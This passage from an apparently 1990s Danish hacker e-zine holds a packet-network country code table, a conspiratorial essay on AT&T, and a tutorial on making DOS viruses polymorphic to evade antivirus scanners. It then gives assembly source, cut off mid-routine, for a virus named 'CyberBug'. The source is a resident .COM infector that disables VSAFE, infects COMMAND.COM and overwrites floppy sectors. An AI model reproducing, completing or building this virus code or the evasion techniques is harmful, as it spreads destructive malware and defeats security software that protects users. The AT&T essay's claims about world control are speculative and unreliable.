  668.                                 TRANSPAC        9336
  669.                                 TRANSPAC        9337
  670.                                 TRANSPAC        9338
  671.                                 TRANSPAC        9339
  672.                 Fr. Antiller    TRANSPAC        2080
  673.                 Fr. guiana      TRANSPAC        2080
  674.                 Fr. Polynesien  TOMPAC          5470
  675.                 Gabon           GABONPAC        6282
  676.                 Tyskland        DATEX-P         2624
  677.                                 DATEX-C         2627
  678.                 Grækenland      HELPAK          2022
  679.                                 HELLASPAC       2023
  680.                 Gr¢nland        KANUPAX         2901
  681.                 Guam            LSDS-RCA        5350
  682.                                 PACNET          5351
  683.                 Guetamala       GUATEL          7040
  684.                                 GUATEL          7043
  685.                 Hondura         HONDUTEL        7080
  686.                                 HONDUTEL        7082
  687.                                 HONDUTEL        7089
  688.                 Hong Kong       INTELPAK        4542
  689.                                 DATAPAK         4545
  690.                                 INET HK         4546
  691.                 Ungarn          DATEX-P         2160
  692.                                 DATEX-P         2161
  693.                 Island          ICEPAK          2740
  694.                 Indien          GPSS            4042
  695.                 Indonesien      SKDP            5101
  696.                 Ireland         EIRPAC          2721
  697.                                 EIRPAC          2724
  698.                 Israel          ISRANET         4251
  699.                 Italien         DARDO           2222
  700.                                 ITAPAC          2227
  701.                 Elfenbens kyst. SYTRANPAC       6122
  702.                 Jamaica         JAMINTEL        3380
  703.                 Japan           GLOBALNET       4400
  704.                                 DDX             4401
  705.                                 NIS-NET         4406
  706.                                 VENUS-P         4408
  707.                                 VENUS-P         9955
  708.                                 VENUS-C         4409
  709.                 Korea Rep.      DACOM-NET       4501
  710.                                 DNS             4503
  711.                 Kuwait          BAHNET          4263
  712.                 Libanon         SODETEL         4155
  713.                 Luxenbourg      LUXPAC          2704
  714.                                 LUXPAC          2709
  715.                 Macau           MACAUPAC        4550
  716.                 Maylasia        MAYPAC          5021
  717.                 Mauritius       MAURIDATA       6170
  718.                 Mexico          TELEPAC         3340
  719.                 Morokko         MOROCCO         6040
  720.                 Holland         DATANET-1       2040
  721.                                 DATANET-1       2041
  722.                                 DABAS           2044
  723.                                 DATANET-1       2049
  724.                 N. Mariana      PACNET          5351
  725.                 New Caledonia   TOMPAC          5460
  726.                 New Zealand     PACNET          5301
  727.                 Niger           NIGERPAC        6142
  728.                 Norge           DATAPAC TTX     2421
  729.                                 DATAPAK         2422
  730.                                 DATAPAC         2423
  731.                 Panama          INTELPAQ        7141
  732.                                 INTELPAQ        7142
  733.                 Peru            DICOTEL         7160
  734.                 Philipinerne    CAPWIRE         5150
  735.                                 CAPWIRE         5151
  736.                                 PGC             5152
  737.                                 GMCR            5154
  738.                                 ETPI            5156
  739.                 Portugal        TELEPAC         2680
  740.                                 SABD            2682
  741.                 Puerto Rico     UDTS            3300
  742.                                 UDTS            3301
  743.                 Qatar           DOHPAC          4271
  744.                 Reunion (Fr.)   TRANSPAC        2080
  745.                 Rwanda          RWANDA          6352
  746.                 San Marino      X-NET           2922
  747.                 Saudi Arabien   ALWASEED        4201
  748.                 Senegal         SENPAC          6081
  749.                 Singapore       TELEPAC         5252
  750.                                 TELEPAC         5258
  751.                 Syd Afrika      SAPONET         6550
  752.                                 SAPONET         6551
  753.                                 SAPONET         6559
  754.                 Spanien         TIDA            2141
  755.                                 IBERPAC         2145
  756.                 Sverige         DATAPAK TTX     2401
  757.                                 DATAPAK-1       2402
  758.                                 DATAPAK-2       2403
  759.                 Schweitz        TELEPAC         2284
  760.                                 TELEPAC         2289
  761.                 Taiwan          PACNET          4872
  762.                                 PACNET          4873
  763.                                 UDAS            4877
  764.                 Thailand        THAIPAC         5200
  765.                                 IDAR            5201
  766.                 Togolese Rep.   TOGOPAC         6152
  767.                 Tortola         IDAS            3483
  768.                 Trinidad        DATANETT        3745
  769.                                 TEXTET          3740
  770.                 Tunesien        RED25           6050
  771.                 Tyrkiet         TURPAC          2862
  772.                                 TURPAC          2863
  773.                                 IDAS            3763
  774.                 Foren. arabiske.EMDAN           4241
  775.                                 EMDAN           4243
  776.                                 TEDAS           4310
  777.                 Uruguay         URUPAC          7482
  778.                                 URUPAC          7489
  779.                 Rusland         IASNET          2502
  780.                 Jomfru ¥erne    UDTS            3320
  781.                 England         IPSS-BTI        2341
  782.                                 PSS-BT          2342
  783.                                 MERCURY         2350
  784.                                 MERCURY         2351
  785.                                 HULL            2352
  786.                 Jugoslavien     YUGOPAC         2201 (NÆPPE OPPE!!!)
  787.                 Zimbabwe        ZIMNET          6482
  788.  
  789.  
  790. 7.      Konklusion
  791.         Jeg håber, at denne artikel har hjulpet dem af jer, som ikke vidste
  792. hvad Datapak var. Alle dem der har været på Datapak f¢r har sikkert ikke fået
  793. noget ud af denne tekst, men det var nu heller ikke meningen. Hvis i finder
  794. nogle fejl (dem er der sikkert et par stykker af), så læg post til mig på
  795. PLAN B, hvilket (stort set) er det eneste sted jeg "kommer" ( ── hmmmm).......
  796.  
  797.  
  798.  
  799.  
  800.  
  801.                 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
  802.  
  803.  
  804.  
  805.  
  806.  
  807.                      AT&T - EN GLOBAL ORGANISATION
  808.                     -------------------------------
  809.                                - Darkseed
  810.  
  811. AT&T betyder for mange kommunikation, og i stort omfang er dette også rigtigt,
  812. men hvad er en eventuel konsekvens af en verdensomspændt koncern, der med tiden
  813. bliver st¢rre og st¢rre - Hvilken effekt kan det få vis kun en koncern får
  814. tilstrækkelig magt, til at styre hele jordens kommunikations-net. Som så mange
  815. har lagt mærke til, gælder f¢lgene regel :
  816. 'DEN DER KONTROLLERE KOMMUNIKATIONEN KONTROLLERE VERDEN'..
  817.  
  818.  
  819. AT&T's f¢rste bygning ligger tilbage til 1882, hvor de åbnede en afdeling i
  820. Antwerp, Belgien, hvorefter de brugte de næste 40 år med at åbne afdelinger og
  821. lægge telefon-linier ud i Europa, Asien samt Afrika. Allerede dengang blev det
  822. besluttet at de ikke skulle have for meget magt, så i 1925 solgte de deres
  823. fremstilling af telefoner til andre lande (ITT-System), Hvor AT&T så rettere
  824. deres interesse for den Universale telefon service i USA, men forsatte dog
  825. stadig deres lang-distance service, til andre lande, hvorefter de i 70'eren
  826. fornyede deres internationale aktiviteter - i 1980, annonceret AT&T så igen at
  827. de ville gå igang igen med styring af den globale verdens kommunikation.
  828.  
  829. Tilbage i 1991 fik AT&T 24% af deres inkomst fra det internationale marked,
  830. hvilket de dengang spåede til at i år 2000, ville det være oppe på 50 %. AT&T
  831. har også gjort store fremskridt indenfor teleudstyr - AT&T har via deres AT&T
  832. Microelektronik produceret over 40 forskellige AT&T produkter designet for
  833. brugerens benyttelse, såsom trådl¢se samt ledning-telefoner, samt telefon-
  834. svarer, der bliver exporteret til hele 24 lande, samt EDB-l¢sninger til såvel
  835. små som st¢rre virksomheder, som ligger både i alm. systemmet samt PBX-
  836. systemmer der er blevet solgt til over 45 lande.
  837. AT&T har 50 distribut¢rer over hele jorden, hvor AT&T Microelektronik har et
  838. netværk med 15 salgs- og teknisk marketing kontorer. AT&T EasyLink er også
  839. blevet sat i kraft med elektronisk beskeder der rykker rundt i hele verden,
  840. samt med Telex-systemmer, sat op over hele kloden, for absolut kommunikation.
  841.  
  842. AT&T INFORMATIONER
  843.  
  844. - i 1991 havde AT&T over 50,000 ansat udenfor deres kontor i USA..
  845.  
  846.         ■ AT&T er aktive i omkring 100 lande rundt om jorden, og laver
  847.           forretninger i 120.
  848.         ■ AT&T har 34 fabriker udenfor USA
  849.           -Hvilket er 16 i Europa, 12 i Asien, 5 i Latin Amerika og 1 i Canada.
  850.         ■ AT&T har 1 fabrik i Sinapore vor 3,270 personer er ansat, her bliver
  851.           der produceret AT&T's trådl¢se telefoner, samt produktionen af
  852.           Sikkereds-systemmer.
  853.           -En fabrik i Bangkok, Thailand ar 850 personer der arbejder på at
  854.            lave telefoner samt telefon-svarer systemmer
  855.           -En fabrik i Guadalajara, Mexico som procedure telefonsvarer-
  856.             systemmer.
  857.           -AT&T Microelektronik laver produkter i både Thailand, Spanien,
  858.            Mexico, Singapore og England.
  859.         ■ AT&T Kapital Corp., har $6 billioner kroner i pungen, med finansering
  860.           af både AT&T og ikke-AT&T produkter samt servicer i Canada og Europe.
  861.  
  862. AT&T har gennem tiden lavet kontrakter med disse lande, om at levere telefon-
  863. linier over hele landet:
  864.  
  865.         BELGIUM         BULGARIA          CZECHOSLOVAKIA
  866.         FRANCE          GERMANY           GREAT BRITAIN
  867.         ITALY           THE NETHERLANDS   POLAND
  868.         SPAIN           SWITZERLAND       ASIA
  869.         BRUNEI          HONG KONG         INDIA
  870.         INDONESIA       JAPAN             CHINA
  871.         PHILIPPINES     SINGAPORE         SOUTH KOREA
  872.         SRI LANKA       TAIWAN            THAILAND
  873.         THE CARIBBEAN   CENTRAL AMERICA   MEXICO
  874.         SOUTH AMERICA   BRAZIL            CHILE
  875.         VENEZUELA       CANADA            MIDDLE EAST
  876.         EGYPT           KUWAIT            SAUDI ARABIA
  877.  
  878. Dette er sådan set alle st¢rre lande, dog er denne liste fra en officiel kilde
  879. fra AT&T udgivet i 1992, der vil nok være flere lande nu, da AT&T hele tiden er
  880. på farten for at blive st¢rre og st¢rre.
  881.  
  882. Som det ses, er AT&T ikke stoppet ved bare at levere telefon-linier, men de er
  883. også en af de st¢rre producenter af EDB-l¢sninger til virksomheder, samt
  884. sikkerheds-systemmer til st¢rre virksomheder - De er sågar igang med at bygge
  885. en kreds uden om den private computerscene, med billige og samtidig kraftfulde
  886. computer, allerede nu er computer-leverand¢ren til KTAS nemlig AT&T...
  887.  
  888. Om bare nogle få år er monopolet på det danske telefon-net til rådighed,
  889. hvilket ikke har gået fordi AT&T's ¢re stille. AT&T er også den mest sand-
  890. synlige tele-virksomhed der vil modtage monopolet på de danske telefonlinier,
  891. fordelen er dog at alle lokale-telefon opkald vil blive gratis, men stadig
  892. bliver det en fordel for AT&T der vil få magten over et land mere end de nu-
  893. tidig har..
  894.  
  895. AT&T har allerede magt nok til at kunne lukke mindre lande totalt ned, og hvis
  896. de bliver for store, kan de sågar lægge hele verden for deres f¢dder. Med den
  897. fart AT&T har på, kan man godt mistænke koncernen at på et tidspunkt at overgå
  898. til et meget og endda for stort penge-syndikat, hvilket både kontrollere både
  899. komunikationen, sikkerheden samt kontakten, hvis AT&T lukker ned for bare et
  900. land, vil helvede sådan set gå l¢s, da man helt mister alt komunikation til det
  901. land..
  902.  
  903. Sagt på en anden måde, at hvis et firma får nok magt over komunikationen vil
  904. selv den mindste manipulation af komunikationen volde verden store problemmer,
  905. en manipulation af komunikationen vil endda kunne forudsage krige over hele
  906. orden, da ingen kan f¢le sig sikker på at det der kommer ud i den anden ende af
  907. r¢ret passer 100 % til det der rent faktisk bliver sagt i den anden ende...
  908.  
  909. Som sagt : Den der kontrollere komunikationen, kontrollere verden.....
  910.  
  911.  
  912.  
  913.  
  914.  
  915.                 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
  916.  
  917.  
  918.  
  919.  
  920.  
  921.                           En Polymorphic Virus
  922.                              Af Clive Sharp
  923.  
  924. 1.      Generelt
  925.         Mange af jer har sikkert h¢rt om polymorphic virus'er, men det er de
  926. færreste der ved, hvordan man laver en, som er andet en bare at kryptere
  927. virus'en, som jo ikke altid er specielt effektivt, for at sige det pænt.
  928.  
  929.  
  930. 2.      Anti-virus
  931.         Men f¢rst skal vi se på hvad anti-virus programmerne kigger efter, når
  932. de pr¢ver at stoppe en virus:
  933.  
  934.         ■       Kender anti-virus programmet denne virus. Dette g¢res ved at
  935.                 s¢ge efter nogle offentligt kendte strenge, som er unikke for
  936.                 præcis denne virus. Nogle strenge kunne f.eks. være:
  937.  
  938.                 ■       "Made by Dark Avenger",
  939.  
  940.                 ■       "141$Flu" (Dette er den aktuelle streng fra Cascade).
  941.  
  942.                 Dvs. at hvis man har en krypteret virus, hvor der aldrig er
  943.                 den samme streng at s¢ge efter, så kan et anti-virus program
  944.                 ikke finde denne virus. Der er desværre ikke rigtigt, for at
  945.                 dekryptere virusen, skal man bruge et lille program (en "load-
  946.                 er"), og så kan anti-virus programmet bare s¢ge på denne "loa-
  947.                 der". Dette vil vi se meget mere til om lidt.
  948.  
  949.                 Problemet med at s¢ge efter strenge er, at anti-virus folkene
  950.                 jo skal have en kopi af programmet, f¢r de kan finde en streng.
  951.                 Dvs. der vil gå noget tid f¢r der kommer et anti-virus program
  952.                 der kan finde ens virus, ligemeget om den er krypteret eller
  953.                 ej.
  954.  
  955.         ■       Nogle anti-virus programmer tager et "billede" af din harddisk
  956.                 hvor den kan se hvis nogle af filerne vokser (et tydeligt tegn
  957.                 på at man har en virus).
  958.  
  959.         ■       Nogle virus scannere kigger hukommelsen igennem efter mistænk-
  960.                 elige rutiner (DOS interrupt) o.s.v. Dette er dog de færreste,
  961.                 da de er temmeligt ustabile (til vores fordel).
  962.  
  963.         ■       En ny slags virus scanner er kommet fra Dr. Solomon's S&S Int-
  964.                 ernational. Den hedder: "Generic Decryption Engine", og den g¢r
  965.                 f¢lgende (meget kort): Hvis den finder noget der kunne være en
  966.                 krypteret virus, dekryptere den virus'en (ved hjælp af "Fuzzy
  967.                 Logic"), og kan derfor finde en del af de polymorphic viruser
  968.                 der er "på markedet" idag.
  969.  
  970.  
  971. 3.      En "normal" virus
  972.         Derefter skal vi se på, hvad en "standart" virus er opbygget af. Dette
  973. kan virke lidt elementært for nogle af jer, men jeg vil gerne have, at selv de
  974. slemmeste WaR3z D0dEz forstår dette, derfor:
  975.  
  976.         ■       En "dropper", dvs. det program der bringer virusen ind i din
  977.                 computer, men ikke selve virusen. Dette kan være et special
  978.                 lavet program, eller bare nogle tilfældige WaR3Z.
  979.  
  980.         ■       Overtagelse af systemet (dette har ikke nogen videre interesse
  981.                 for os, så det vil vi ikke uddybe nærmere).
  982.  
  983.         ■       Kryptering/dekryptering (en "loader"). Mange tror, at er en
  984.                 virus krypteret, så er den polymorphic og kan ikke findes af
  985.                 anti-virus programmer. Begge dele er forkert! Dette vil vi se
  986.                 meget mere til senere.
  987.  
  988.         ■       Anti-antivirus [Retro]. De lidt mere avancerede virus'er chec-
  989.                 ker om der er nogle anti-virus programmer residente i hukommel-
  990.                 sen, eller om der ligger nogle scannere på harddisken. Hvis de
  991.                 finder nogle antivirus programmer, bliver disse "slået fra",
  992.                 eller på andre måder omgået. (Dette vil ikke blive nærmere
  993.                 uddybet her).
  994.  
  995.         ■       Derefter lægger virusen sig ned i boot-sektoren eller i .com/
  996.                 .exe filer. Dette vil ikke blive beskrevet nærmere.
  997.  
  998.         ■       De fleste viruser har også en "payload", som f.eks kan være at
  999.                 slette hele din harddisk, eller spille en lille melodi. Dette
  1000.                 har ingen interesse for os.
  1001.  
  1002.         Dette var en meget kort gennemgang af hvordan en virus virker, og jeg
  1003. håber at den ikke var alt for overfladisk, men da dette jo handler om polymorp-
  1004. hic virus'er, er det kun det lille "loader" program, der har vores interesse.
  1005.  
  1006.  
  1007. 4.      "Loaderen"
  1008.         For at se forskellen på en krypteret virus, og en "normal" ikke krypt-
  1009. eret virus er her to illustrationer:
  1010.  
  1011.         a.      ╔═════════╗
  1012.                 ║         ║
  1013.                 ║         ║
  1014.                 ║         ║
  1015.                 ║         ║
  1016.                 ║         ║
  1017.                 ║  Kode   ║      En IKKE krypteret virus.
  1018.                 ║         ║
  1019.                 ║         ║
  1020.                 ║         ║
  1021.                 ║         ║
  1022.                 ║         ║
  1023.                 ╚═════════╝
  1024.  
  1025.         b.      ╔═════════╗
  1026.                 ║         ║
  1027.                 ║"LOADER" ║
  1028.                 ║         ║
  1029.                 ╠═════════╣
  1030.                 ║  Kryp-  ║
  1031.                 ║  teret  ║      En krypteret virus.
  1032.                 ║  kode   ║
  1033.                 ║         ║
  1034.                 ║         ║
  1035.                 ║         ║
  1036.                 ║         ║
  1037.                 ╚═════════╝
  1038.  
  1039.         Alle burde nu have forstået, at det er "loaderen" der er problemet,
  1040. da man kan have den vildeste kryptering, men hvis man bruger den samme "load-
  1041. er" så hjælper det bare ikke. "Loaderen" skal g¢res polymorphic.
  1042.  
  1043.  
  1044. 5.      The polymorphic loader
  1045.         Det vi skal g¢re, for at g¢re vores virus polomorphic er, at få vores
  1046. "loader" til at muterer. Det g¢res på f¢lgende måde:
  1047.  
  1048.         ■       For hver kommando vi har i vores "loader" (dekrypter), finder
  1049.                 vi nogle andre kommandoer, som resulterer i, at de scan strenge
  1050.                 der bruges, ikke længere er korrekte, f.eks.:
  1051.  
  1052.                 ■       INC DI bliver kan blive til:
  1053.                         ADD DI,1 eller til ADD DI,3 - SUB DI,2 o.s.v.
  1054.                         Resultatet er, at den samme kommando bliver udf¢rt
  1055.                         (registeret DI bliver 1 st¢rre), men på en forskellig
  1056.                         måde hver gang!
  1057.  
  1058.                 Der kan også skiftes mellem de registrer der er i computeren,
  1059.                 da det også giver nye scan strenge.
  1060.  
  1061.         Det vil sige, at hver gang er der 3-5 muligheder for at erstatte den
  1062. f¢rste kommando, 3-5 muligheder for at erstatte den 2 kommando o.s.v.
  1063.         Desværre er det rimeligt nemt for anti-virus programmerne at lave lidt
  1064. statistisk regning, og med h¢j sansynlighed at sige: her er en virus. Men det
  1065. problem kan også fikses, nemlig med "Noise Bytes".
  1066.  
  1067.         ■       "Noise Bytes" er nogle kommandoer, som ikke har nogen betyd-
  1068.                 ning for udf¢relsen af vores program, men som virker forvir-
  1069.                 rende, og som g¢r det sværere at lave statistisk regning på
  1070.                 vores virus. Nogle kommandoer kan f.eks være:
  1071.  
  1072.                 ■       CLI     (Clear Interrupt Flag)
  1073.                         STI     (Set Interrupt Flag)
  1074.                         NOP     (No Operation)
  1075.  
  1076.                 ■       MOV DI,12       (Forudsat at vi ikke bruger DI)
  1077.                         MOV CX,1234     (Forudsat at vi ikke bruger CX)
  1078.                         O.S.V.
  1079.  
  1080.         Det vil sige, at når man har 3-5 (eller flere) funktioner, som g¢r det
  1081. samme, og bruger et variabelt antal "Noise Bytes", så har man en Polymorphic
  1082. virus.
  1083.  
  1084.  
  1085. 6.      Forskellige former for viruser
  1086.         Her til sidst vil jeg vise en lille oversigt, over div. former for
  1087. viruser:
  1088.  
  1089.         ■       En standart, ikke krypteret virus:
  1090.  
  1091.                 84 85 4D 25 14 5E 8F 65 07 82 6A 4C 88 A9 B2 65 E1 38 3B AA 8D
  1092.                 │                                                            │
  1093.                 └─────────────────────────────┬──────────────────────────────┘
  1094.                                               │
  1095.                 Normale kommandoer ───────────┘
  1096.  
  1097.         ■       En standart, krypteret virus:
  1098.  
  1099.                 87 45 2A 78 3D 6B 76 AB XX XX XX XX XX XX XX XX XX XX XX XX XX
  1100.                 │                     │ │                                    │
  1101.                 └──────────┬──────────┘ └─────────────────┬──────────────────┘
  1102.                            │                              │
  1103.                 "Loader" ──┘                              │
  1104.                 Krypteret data ───────────────────────────┘
  1105.  
  1106.         ■       En semi-Polymorphic virus:
  1107.  
  1108.                 "Loader" ──┐
  1109.                            │
  1110.                 ┌──────────┴──────────┐
  1111.                 │                     │
  1112.                 87 45 3D YY YY YY 74 AB XX XX XX XX XX XX XX XX XX XX XX XX XX
  1113.                          │      │       │                                    │
  1114.                          └───┬──┘       └─────────────────┬──────────────────┘
  1115.                              │                            │
  1116.                 "Noise Bytes"┘                            │
  1117.                 Krypteret data ───────────────────────────┘
  1118.  
  1119.         ■       En Polymorphic virus:
  1120.  
  1121.                 "Loader" ──┐
  1122.                            │
  1123.                 ┌──────────┴──────────┐
  1124.                 │                     │
  1125.                 ZZ ZZ ZZ YY YY YY ZZ ZZ XX XX XX XX XX XX XX XX XX XX XX XX XX
  1126.                 │      │ │      │ │   │ │                                    │
  1127.                 └───┬──┘ └───┬──┘ └─┬─┘ └─────────────────┬──────────────────┘
  1128.                     │        │      │                     │
  1129.                 Var. funk.   │      │                     │
  1130.                 "Noise Bytes"┘      │                     │
  1131.                 Variable funktioner ┘                     │
  1132.                 Krypteret data ───────────────────────────┘
  1133.  
  1134.                 Med variable funktioner (var. funk.) menes der selvf¢lgeligt
  1135.                 f¢romtalte metode til at mutere loaderne, med forskellige
  1136.                 kommandoer, som g¢r det samme.
  1137.  
  1138.  
  1139. 7.      Konklusion
  1140.         For at g¢re en virus 100% Polymorphic skal den have:
  1141.  
  1142.         ■       Et variabelt antal "Noise Bytes".
  1143.  
  1144.         ■       Flere forskellige måder at udf¢re en kommando på.
  1145.  
  1146.         ■       Brugen af flere forskellige registre.
  1147.  
  1148.         ■       Variabel længde ("loader" og event. krypteret data).
  1149.  
  1150.         ■       Forskellig kryptering af data'en.
  1151.  
  1152.         Jeg håber, at dette har hjulpet dem, der ikke vidste hvordan en Poly-
  1153. morphic virkede, så nu skal du bare lave en......
  1154.  
  1155.  
  1156.  
  1157.  
  1158.  
  1159.                 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
  1160.  
  1161.  
  1162.  
  1163.  
  1164.  
  1165.                Hvad vil fremtiden bringe for Dommedag Nu?
  1166.                              Af Clive Sharp
  1167.  
  1168.  
  1169.         I den nærmeste fremtid vil der ske mange ændringer med Dommedag Nu /
  1170. SMERSH. Vi regner med, at efter Dommedag Nu nr. 5. (som sandsynligvis vil blive
  1171. released til The Party i julen 1995), så stopper vi enten bladet, eller så ænd-
  1172. re vi bladet til en slags "nyhedsbrev", som så vil udkomme oftere, og i mindre
  1173. st¢rrelse (5 - 20 K), og kun omhandlende (ca.) et emne. Alt dette kommer selv-
  1174. f¢lgeligt an på, hvor meget materiale vi får fra alle jer kære læsere, da vi
  1175. ikke selv magter at producere nok materiel til et blad i denne st¢rrelse (da vi
  1176. jo også har et liv at leve ved siden af Dommedag Nu).
  1177.  
  1178.         Vi regner med, at PLAN B går ned i l¢bet af max. 1-2 måneder, men det
  1179. vil komme op igen (grunden er at vores SysGud, Deja-Vu, har nogle, hmm "Person-
  1180. lige problemer"), men imens vil Darkside Connection være vores "hovedkvarter".
  1181.  
  1182.         I Dommedag Nu nr. 5. får vi en masse spændende nye ting at vise jer,
  1183. det skyldes ikke mindst, at SMERSH har fået nogle nye medlemmer, som rykker, på
  1184. mange områder, så det skal nok blive et spændende blad. Desuden vil Danmarks
  1185. Super-Virus-Koder, Darkman, lave en polymorphic engine til os, en såkaldt
  1186. DDN-M (hmmm). Den skal nok være værd at vente på.
  1187.  
  1188.         Ellers vil vi bare anbefale alle jer der er interesseret i HPV, at være
  1189. til The Party (julen 1995), for selvom at det er et WaR3z party, så er det en
  1190. god mulighed for alle HPV folk at m¢des. Vær der!
  1191.  
  1192.  
  1193.  
  1194.  
  1195.  
  1196.                 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
  1197.  
  1198.  
  1199.  
  1200.  
  1201.  
  1202.                             CyberBug v. 1.00
  1203.                  Af TorNado (Indledning af Clive Sharp)
  1204.  
  1205.         Ja, så er den her. Bladets f¢rste virus (bortset fra Quicksilver
  1206. virus'en, ikke Deja-Vu?). Det er ellers imod vores politik, at have artikler i
  1207. bladet, som ikke skrevet på dansk, men vi har diskuteret lidt frem og tilbage,
  1208. og er nået til den konklusion, at det vil lyde dumt, og være kraftigt menings-
  1209. forstyrrende, at oversætte det til dansk, så i må leve med det, som det er.
  1210.  
  1211.  
  1212. ;============================================================================
  1213. ;
  1214. ;      Virus Name  :     CyberBug v. 1.00
  1215. ;      Length      :     757 bytes
  1216. ;      Author      :     TorNado
  1217. ;      Origin      :     Denmark 1995
  1218. ;
  1219. ;      Description :     -- Resident .COM infector ( 4bh = execute )
  1220. ;                        -- File stealth 11h / 12h find first / find next
  1221. ;                        -- XOR - Encryption
  1222. ;                        -- Intercept INT24 ( Critical Error Handler )
  1223. ;                        -- Anti-Debugging
  1224. ;                        -- Saves Time / Date / Attributes
  1225. ;                        -- Infect COMMAND.COM
  1226. ;                        -- Create file cyberbug.bat ( 3ch = file create )
  1227. ;                           the BATCH file will contain one single line which 
  1228. ;                           is " echo > clock$ " 
  1229. ;                        -- Remove VSAFE from memory
  1230. ;                        -- Change drive to A:\ at a bad time (nuke tracks)
  1231. ;
  1232. ;      To Compile  :     -- TASM /m2 cyberbug.asm
  1233. ;                           TLINK /t cyberbug.obj
  1234. ;
  1235. ;============================================================================
  1236.  
  1237. cyberbug        segment
  1238.         assume cs:cyberbug,ds:cyberbug,es:cyberbug
  1239.         org 100h
  1240.  
  1241. start:          call    delta
  1242.  
  1243. vir_size        equ     codeend-start
  1244.  
  1245. delta:          call    $+3
  1246.         int     1h 
  1247.         call    fuck_tbscan
  1248.         call    deltaOFF
  1249.  
  1250. ;────────────────────────────────────────────────────────────────────────────
  1251. ; Get delta offset and decrypt virus
  1252. ;────────────────────────────────────────────────────────────────────────────
  1253.  
  1254. deltaOFF:       pop     bp
  1255.         sub     bp,offset deltaOFF
  1256.  
  1257.         call    encrypt_decrypt            ;decrypt virus
  1258.  
  1259. ;────────────────────────────────────────────────────────────────────────────
  1260. ; Remove VSAFE, make cleaning impossible and drop program ( cyberbug.bat )
  1261. ;────────────────────────────────────────────────────────────────────────────
  1262.  
  1263. begin:          call    vsafe
  1264.         call    anti_debug
  1265.         call    drop_program
  1266.         jmp     short doit
  1267.  
  1268. ;────────────────────────────────────────────────────────────────────────────
  1269. ; Confuse TBSCAN ( no flags on infected files at all !! )
  1270. ;────────────────────────────────────────────────────────────────────────────
  1271.         
  1272. fuck_tbscan:    mov     ax,0305h                         ; keyb i/o           
  1273.         xor     bx,bx
  1274.         int     16h
  1275.         ret
  1276.  
  1277. anti_debug:     mov     cx,09ebh
  1278.         mov     ax,0fe05h               
  1279.         jmp     $-2
  1280.         add     ah,03bh                 
  1281.         jmp     $-10                    
  1282.         int     21h
  1283.         ret
  1284.  
  1285. go_resident:    mov     ax,[si]
  1286.         mov     es:[di],ax
  1287.         mov     ax,[si+2]
  1288.         mov     es:[di+2],ax
  1289.  
  1290.         cli                             ; Disable interrupts
  1291.         mov     ds:[si],bx
  1292.         mov     ds:[si+2],es
  1293.         sti                             ; Enable interrupts
  1294.         ret
  1295.  
  1296. ;────────────────────────────────────────────────────────────────────────────
  1297. ; Prepare virus to go resident hook some memory
  1298. ;────────────────────────────────────────────────────────────────────────────
  1299.  
  1300. doit:           mov     cx,es
  1301.         dec     cx
  1302.         mov     es,cx
  1303.  
  1304.         mov     bx,es:[03h]
  1305.  
  1306.         mov     dx,offset codeend-offset start
  1307.         mov     cl,4
  1308.         shr     dx,cl
  1309.         add     dx,4
  1310.  
  1311.         mov     cx,es
  1312.         inc     cx
  1313.         mov     es,cx
  1314.  
  1315.         sub     bx,dx
  1316.         mov     ah,4Ah
  1317.         int     21h                      ; do it
  1318.  
  1319.         jc      do_work                  ; jump to ok
  1320.         dec     dx
  1321.         
  1322.         mov     ah,48h                ;allocate enough mem for virus
  1323.         mov     bx,(vir_size+15)/16
  1324.         int     21h
  1325.         jc      do_work                  ; jump to ok
  1326.  
  1327.         dec     ax                          ;ax-1 = MCB
  1328.         mov     es,ax
  1329.         mov     word ptr es:[1],8           ;Mark DOS as owner
  1330.  
  1331.         mov     si,offset offset start
  1332.         add     si,bp
  1333.         sub     ax,0Fh
  1334.         mov     es,ax
  1335.         mov     di,0100h
  1336.         mov     cx,offset codeend-offset start
  1337.         cld
  1338.         rep     movsb
  1339.         xor     ax,ax
  1340.         mov     ds,ax
  1341.         mov     di,offset oldint21
  1342.         mov     si,084h
  1343.         mov     bx,offset virusint21
  1344.  
  1345.         call    go_resident
  1346.  
  1347. do_work:        push    cs
  1348.         pop     es
  1349.         push    es
  1350.         pop     ds
  1351.         mov     di,0100h
  1352.         mov     si,offset buffer
  1353.         add     si,bp
  1354.         movsw
  1355.         movsb
  1356.         pop     cx
  1357.         pop     ax
  1358.         xor     dx,dx
  1359.         push    dx
  1360.         xor     bp,bp
  1361.         xor     si,si
  1362.         xor     di,di
  1363.         mov     bx,0100h
  1364.         push    bx
  1365.         xor     bx,bx
  1366.         retn
  1367.  
  1368. ;────────────────────────────────────────────────────────────────────────────
  1369. ; If u change to drive A:\ ther is a little chance it might get fucked up!!
  1370. ;────────────────────────────────────────────────────────────────────────────
  1371.  
  1372. read_floppy:    push    ax bx cx dx bp si di ds es 
  1373.         
  1374.         cmp     dl,0
  1375.         je      floppy_time
  1376.         jne     runforit
  1377.         
  1378. floppy_time:    mov     ah,2ch 
  1379.         int     21h
  1380.         
  1381.         cmp     cl,55           ; minute = 55 ?
  1382.         jge     kill_floppy
  1383.         jmp     runforit
  1384.         
  1385. kill_floppy:    cli                 
  1386.         cwd                 
  1387.         mov     cx,255          
  1388.         int     26h             
  1389.         sti                 
  1390.  
  1391. runforit:       pop     es ds di si bp dx cx bx ax
  1392.         jmp     function21
  1393.         
  1394. virusint24       proc    far   
  1395.          mov     al,0   
  1396.          iret           
  1397. virusint24       endp
  1398.  
  1399. ;────────────────────────────────────────────────────────────────────────────
  1400. ; FCB stealth no file size change on infected files in DIR listing
  1401. ;────────────────────────────────────────────────────────────────────────────
  1402. FCB_stealth:    pushf
  1403.         push    cs        
  1404.         call    function21
  1405.         
  1406.         cmp     al,00     
  1407.         jnz     dir_error         
  1408.         
  1409.         push    ax bx es
  1410.                 mov     ah,51h                           ; Get active PSP to
  1411.                 int     21h                              ; es:bx
  1412.         mov     es,bx                           
  1413.         cmp     bx,es:[16h]      
  1414.         jnz     error_stealth          
  1415.         mov     bx,dx                           
  1416.         mov     al,[bx]                          ; al = current drive
  1417.         push    ax                               
  1418.         mov     ah,2fh                           ; get dta area
  1419.         int     21h                              
  1420.         pop     ax               
  1421.         inc     al               
  1422.         jnz     normal_fcb       
  1423.         
  1424. ext_fcb:        add     bx,7h            
  1425. normal_fcb:     mov     ax,es:[bx+17h]   
  1426.         and     ax,1fh
  1427.         xor     al,01h
